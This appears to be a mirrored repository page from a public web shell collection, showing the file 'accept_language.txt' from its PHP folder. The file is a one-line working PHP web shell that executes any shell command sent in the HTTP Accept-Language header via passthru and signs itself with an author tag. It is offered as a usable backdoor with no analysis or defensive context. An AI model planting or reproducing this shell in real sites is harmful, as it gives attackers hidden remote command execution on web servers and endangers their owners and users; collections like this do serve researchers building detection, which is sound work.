1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-07 21:31:29 +00:00
Files
webshell/web-malware-collection-13-06-2012/PHP/accept_language.txt
2013-06-05 12:08:30 +08:00

2 lines
76 B
Plaintext

<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>